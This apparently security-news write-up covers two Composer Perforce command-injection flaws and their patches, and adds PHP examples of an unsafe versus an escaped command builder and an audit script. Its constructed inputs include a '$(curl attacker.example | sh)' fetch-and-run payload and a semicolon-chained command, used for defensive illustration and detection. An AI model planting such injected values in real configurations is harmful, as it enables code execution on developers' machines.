In the PHP ecosystem, Composer is the undisputed heavy hitter for dependency management, responsible for orchestrating the libraries that power millions of applications. However, security researchers have recently identified two significant vulnerabilities in how Composer interacts with Perforce repositories, flaws that could turn a routine composer install into a full system compromise.
The vulnerabilities, which allow for Remote Command Injection, strike at both the local project level and the broader supply chain.
The first vulnerability, tracked as CVE-2026-40176 (CVSS score of 7.8), involves an oversight in the Perforce::generateP4Command() method. This method was found to construct shell commands by interpolating user-supplied connection parameters (the port, user, and client) directly into the command string without proper escaping.
An attacker can exploit this by controlling the repository configuration within a malicious composer.json file. If a developer runs Composer commands on an untrusted project containing these malicious values, arbitrary commands could be executed in the context of their user account.
Crucially, this specific flaw is restricted to the root composer.json or the global composer config; it cannot be triggered by dependencies deeper in the project tree.
While the first flaw requires a malicious local file, the second vulnerability (CVE-2026-40261) is significantly more dangerous, carrying a CVSS score of 8.8. This flaw lives in the same Perforce::generateP4Command() method, but in its handling of the source reference and source URL parameters.
This vulnerability can be exploited through any compromised or malicious Composer repository. A malicious repository can serve metadata that declares Perforce as a source type, embedding shell metacharacters directly into the source reference or URL.
The attack is particularly potent because it does not require Perforce to be installed on the victim's machine; Composer will still hand the malformed command to the shell, which executes the injected metacharacters before p4 is ever looked up. Users are primarily at risk when installing or updating dependencies from source, most commonly when the --prefer-source flag is in effect.
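The following PHP snippet is an added illustration for this write-up and is not Composer's own code. It reproduces the pattern described for both CVEs side by side: connection parameters (port, user, client) and a source reference interpolated into a p4 command line, next to a hardened form that escapes every attacker-influenced value. The option letters, the sync subcommand and the depot path are ordinary p4 syntax; how Composer itself assembles the command is not reproduced, and the hostile values, host names and depot path are constructed.

```php
<?php
// Added illustrative example for this write-up; it is not Composer's code.
// Mirrors the pattern the advisory describes: values from composer.json
// (connection parameters) and from repository metadata (source reference)
// are interpolated into a p4 command line. Hosts and paths are placeholders.

declare(strict_types=1);

/** Unsafe: configuration values go straight into the shell command string. */
function buildP4CommandUnsafe(array $conn, string $subcommand): string
{
    return 'p4 -u ' . $conn['user']
        . ' -c ' . $conn['client']
        . ' -p ' . $conn['port']
        . ' ' . $subcommand;
}

/** Hardened: every attacker-influenced value becomes exactly one shell argument. */
function buildP4CommandSafe(array $conn, string $subcommand): string
{
    return 'p4 -u ' . escapeshellarg($conn['user'])
        . ' -c ' . escapeshellarg($conn['client'])
        . ' -p ' . escapeshellarg($conn['port'])
        . ' ' . $subcommand;
}

/**
 * Build a "sync <depot>@<ref>" subcommand. The reference comes from repository
 * metadata, so it is just as untrusted as the connection parameters and must
 * be escaped as part of the same argument when $escape is true.
 */
function syncSubcommand(string $depotPath, string $reference, bool $escape): string
{
    $arg = $depotPath . '@' . $reference;   // e.g. //depot/lib@1234
    return 'sync ' . ($escape ? escapeshellarg($arg) : $arg);
}

// Constructed hostile inputs of the two kinds the advisory describes.
$conn = [
    'user'   => 'dev',
    'client' => 'build-ws',
    'port'   => 'perforce.example:1666; id > /tmp/injected',   // CVE-2026-40176 style
];
$reference = '$(curl attacker.example | sh)';                     // CVE-2026-40261 style
$depot     = '//depot/lib';

// Only the command strings are printed; nothing here is executed.
echo 'UNSAFE: ', buildP4CommandUnsafe($conn, syncSubcommand($depot, $reference, false)), "\n";
echo 'SAFE:   ', buildP4CommandSafe($conn, syncSubcommand($depot, $reference, true)), "\n";
```

In the unsafe line the `;` terminates the p4 invocation and the `$(...)` substitution runs before p4 is even resolved, which is why the attack works on a machine without Perforce installed. In the hardened line escapeshellarg wraps each value in single quotes (escaping any embedded single quote), so the metacharacters reach p4 as literal bytes and p4 merely rejects a bogus port or reference. Escaping alone is the minimum; validating the port against a host:port pattern and the reference against Perforce's changelist/label syntax before building the command is cheap defence in depth. Note that escapeshellarg behaves differently on Windows (double quotes, with %, ! and embedded double quotes blanked), so exercise the code on every platform the tooling runs on.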
The maintainers of Composer have released urgent patches to address these injection vectors. Organizations should immediately upgrade to Composer 2.2.27 (for 2.2 LTS) or Composer 2.9.6 (for the mainline branch). These versions include proper escaping for the generateP4Command() method, effectively closing the injection window.
If an immediate upgrade is not possible, security teams are advised to implement the following safeguards:
- Prefer Distributions: Avoid installing dependencies from source by using the --prefer-dist flag or by setting the preferred-install configuration option to dist. This addresses the repository-served vector (CVE-2026-40261), which requires a source checkout; the root composer.json vector (CVE-2026-40176) still depends on not running Composer against untrusted projects.
- Trust but Verify: Only run Composer commands on projects from trusted sources, and inspect composer.json (and composer.lock) for Perforce-typed repository or source entries whose URL, user, client, or reference values contain shell metacharacters.
- Limit Repositories: Strictly limit your environment to known, trusted Composer repositories.
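The audit below is an added example for this write-up, not a Composer feature: a read-only PHP script that walks a composer.json or composer.lock document, flags every Perforce-typed repository definition or package source block whose string fields fall outside a conservative character set, and reports whether dist installs are enforced. It depends on no field name other than "type", so it does not assume Composer's exact schema; the field names in the constructed sample document (p4user, url, reference) and its host names are assumptions for illustration.

```php
<?php
// Added example for this write-up, not Composer's own code: a read-only audit
// of a composer.json / composer.lock document for the Perforce-related fields
// the advisory says to inspect. The sample document below is constructed and
// its field names beyond "type" are assumptions; the checker does not rely
// on them.

declare(strict_types=1);

/** Conservative allowlist covering p4 ports, depot paths, users, clients and refs. */
const SAFE_VALUE = '/^[A-Za-z0-9_.\/:@+\-]*$/';

/** True when a string field of a Perforce-typed entry contains anything outside the allowlist. */
function isSuspicious(string $value): bool
{
    return preg_match(SAFE_VALUE, $value) !== 1;
}

/**
 * Check "repositories" entries (composer.json) and package "source" blocks
 * (composer.lock / installed.json). Every string field of an entry typed
 * "perforce" is checked. Returns human-readable findings; empty means clean.
 */
function auditPerforceEntries(array $doc): array
{
    $findings = [];
    $check = function (string $where, array $entry) use (&$findings): void {
        if (strtolower((string) ($entry['type'] ?? '')) !== 'perforce') {
            return;
        }
        foreach ($entry as $field => $value) {
            if ($field !== 'type' && is_string($value) && isSuspicious($value)) {
                $findings[] = sprintf('%s.%s = %s', $where, $field, json_encode($value));
            }
        }
    };

    // "repositories" may be a list or an object keyed by name; false entries disable a repo.
    foreach ($doc['repositories'] ?? [] as $name => $repo) {
        if (is_array($repo)) {
            $check("repositories[$name]", $repo);
        }
    }
    foreach (['packages', 'packages-dev'] as $list) {
        foreach ($doc[$list] ?? [] as $pkg) {
            if (isset($pkg['source']) && is_array($pkg['source'])) {
                $check(sprintf('%s[%s].source', $list, $pkg['name'] ?? '?'), $pkg['source']);
            }
        }
    }
    return $findings;
}

/** True only when config.preferred-install explicitly forces dist (string or all-dist map). */
function prefersDist(array $doc): bool
{
    $pref = $doc['config']['preferred-install'] ?? null;
    if (is_string($pref)) {
        return $pref === 'dist';
    }
    if (is_array($pref)) {
        return $pref !== [] && array_filter($pref, fn ($v) => $v !== 'dist') === [];
    }
    return false;   // unset: treat as "not enforced" for audit purposes
}

// Constructed sample mixing a root composer.json and a lock-style package entry.
$sample = json_decode(<<<'JSON'
{
  "config": { "preferred-install": "source" },
  "repositories": [
    { "type": "perforce", "url": "ssl:perforce.example:1666; id > /tmp/injected", "p4user": "dev" }
  ],
  "packages": [
    { "name": "vendor/lib",
      "source": { "type": "perforce", "url": "//depot/lib", "reference": "$(curl attacker.example | sh)" } }
  ]
}
JSON, true, 512, JSON_THROW_ON_ERROR);

foreach (auditPerforceEntries($sample) as $finding) {
    echo "SUSPICIOUS: $finding\n";
}
echo prefersDist($sample)
    ? "preferred-install: dist is enforced\n"
    : "preferred-install is not dist: source checkouts (and the CVE-2026-40261 path) remain possible\n";
```

To run it against a real project, replace the constructed nowdoc with file_get_contents('composer.json') and again with 'composer.lock'; the lock file is where repository-served metadata lands locally, so auditing both covers the root-config and the supply-chain vector. The allowlist is deliberately strict: a flagged value is not proof of an attack, but any Perforce port, user, client or reference containing quotes, semicolons, pipes, backticks or "$(" warrants a manual look before Composer is run.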